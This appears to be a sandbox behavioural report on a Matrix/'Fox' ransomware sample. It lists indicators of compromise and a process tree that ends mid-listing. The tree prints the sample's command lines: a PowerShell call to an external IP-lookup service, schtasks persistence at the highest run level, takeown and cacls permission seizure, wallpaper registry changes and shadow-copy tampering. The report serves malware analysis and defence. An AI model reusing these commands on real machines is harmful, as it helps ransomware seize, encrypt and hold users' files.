42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: uSDT8H9y64.exe File opened (read-only) \??\W: uSDT8H9y64.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: uSDT8H9y64.exe File opened (read-only) \??\G: uSDT8H9y64.exe File opened (read-only) \??\H: uSDT8H9y64.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: uSDT8H9y64.exe File opened (read-only) \??\N: uSDT8H9y64.exe File opened (read-only) \??\S: uSDT8H9y64.exe File opened (read-only) \??\V: uSDT8H9y64.exe File opened (read-only) \??\Z: uSDT8H9y64.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\B: uSDT8H9y64.exe File opened (read-only) \??\Q: uSDT8H9y64.exe File opened (read-only) \??\U: uSDT8H9y64.exe File opened (read-only) \??\X: uSDT8H9y64.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\A: uSDT8H9y64.exe File opened (read-only) \??\I: uSDT8H9y64.exe File opened (read-only) \??\M: uSDT8H9y64.exe File opened (read-only) \??\O: uSDT8H9y64.exe File opened (read-only) \??\T: uSDT8H9y64.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: uSDT8H9y64.exe File opened (read-only) \??\L: uSDT8H9y64.exe File opened (read-only) \??\Y: uSDT8H9y64.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: uSDT8H9y64.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\VjQ8qyxz.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\ChkrRes.dll.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgzm.exe.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1624 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3992 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2872 powershell.exe 3308 uSDT8H9y64.exe 3308 uSDT8H9y64.exe 3308 uSDT8H9y64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3308 uSDT8H9y64.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 3308 uSDT8H9y64.exe Token: SeLoadDriverPrivilege 3308 uSDT8H9y64.exe Token: SeTakeOwnershipPrivilege 2068 takeown.exe Token: SeTakeOwnershipPrivilege 3780 takeown.exe Token: SeBackupPrivilege 1604 vssvc.exe Token: SeRestorePrivilege 1604 vssvc.exe Token: SeAuditPrivilege 1604 vssvc.exe Token: SeTakeOwnershipPrivilege 616 takeown.exe Token: SeTakeOwnershipPrivilege 2984 takeown.exe Token: SeTakeOwnershipPrivilege 548 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2696 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 30 PID 2360 wrote to memory of 2696 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 30 PID 2360 wrote to memory of 2696 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 30 PID 2360 wrote to memory of 2696 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 30 PID 2360 wrote to memory of 2580 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 32 PID 2360 wrote to memory of 2580 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 32 PID 2360 wrote to memory of 2580 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 32 PID 2360 wrote to memory of 2580 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 32 PID 2360 wrote to memory of 2028 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 34 PID 2360 wrote to memory of 2028 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 34 PID 2360 wrote to memory of 2028 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 34 PID 2360 wrote to memory of 2028 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 34 PID 2028 wrote to memory of 2872 2028 cmd.exe 36 PID 2028 wrote to memory of 2872 2028 cmd.exe 36 PID 2028 wrote to memory of 2872 2028 cmd.exe 36 PID 2028 wrote to memory of 2872 2028 cmd.exe 36 PID 2360 wrote to memory of 1740 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2360 wrote to memory of 1740 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2360 wrote to memory of 1740 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2360 wrote to memory of 1740 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2360 wrote to memory of 1980 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 38 PID 2360 wrote to memory of 1980 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 38 PID 2360 wrote to memory of 1980 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 38 PID 2360 wrote to memory of 1980 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 38 PID 1980 wrote to memory of 2508 1980 cmd.exe 41 PID 1980 wrote to memory of 2508 1980 cmd.exe 41 PID 1980 wrote to memory of 2508 1980 cmd.exe 41 PID 1980 wrote to memory of 2508 1980 cmd.exe 41 PID 1740 wrote to memory of 3000 1740 cmd.exe 42 PID 1740 wrote to memory of 3000 1740 cmd.exe 42 PID 1740 wrote to memory of 3000 1740 cmd.exe 42 PID 1740 wrote to memory of 3000 1740 cmd.exe 42 PID 2360 wrote to memory of 2004 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2360 wrote to memory of 2004 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2360 wrote to memory of 2004 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2360 wrote to memory of 2004 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 1740 wrote to memory of 2640 1740 cmd.exe 44 PID 1740 wrote to memory of 2640 1740 cmd.exe 44 PID 1740 wrote to memory of 2640 1740 cmd.exe 44 PID 1740 wrote to memory of 2640 1740 cmd.exe 44 PID 1740 wrote to memory of 2884 1740 cmd.exe 46 PID 1740 wrote to memory of 2884 1740 cmd.exe 46 PID 1740 wrote to memory of 2884 1740 cmd.exe 46 PID 1740 wrote to memory of 2884 1740 cmd.exe 46 PID 2004 wrote to memory of 2744 2004 cmd.exe 47 PID 2004 wrote to memory of 2744 2004 cmd.exe 47 PID 2004 wrote to memory of 2744 2004 cmd.exe 47 PID 2004 wrote to memory of 2744 2004 cmd.exe 47 PID 2004 wrote to memory of 748 2004 cmd.exe 48 PID 2004 wrote to memory of 748 2004 cmd.exe 48 PID 2004 wrote to memory of 748 2004 cmd.exe 48 PID 2004 wrote to memory of 748 2004 cmd.exe 48 PID 2508 wrote to memory of 2888 2508 wscript.exe 49 PID 2508 wrote to memory of 2888 2508 wscript.exe 49 PID 2508 wrote to memory of 2888 2508 wscript.exe 49 PID 2508 wrote to memory of 2888 2508 wscript.exe 49 PID 2004 wrote to memory of 1072 2004 cmd.exe 51 PID 2004 wrote to memory of 1072 2004 cmd.exe 51 PID 2004 wrote to memory of 1072 2004 cmd.exe 51 PID 2004 wrote to memory of 1072 2004 cmd.exe 51 PID 2888 wrote to memory of 1624 2888 cmd.exe 53 PID 2888 wrote to memory of 1624 2888 cmd.exe 53 PID 2888 wrote to memory of 1624 2888 cmd.exe 53 PID 2888 wrote to memory of 1624 2888 cmd.exe 53 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"2⤵PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe" -n2⤵
- Executes dropped EXE
PID:2580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\VsXhzO5K.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3000
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:4024
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:652
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\uSDT8H9y64.exeuSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:3956 -
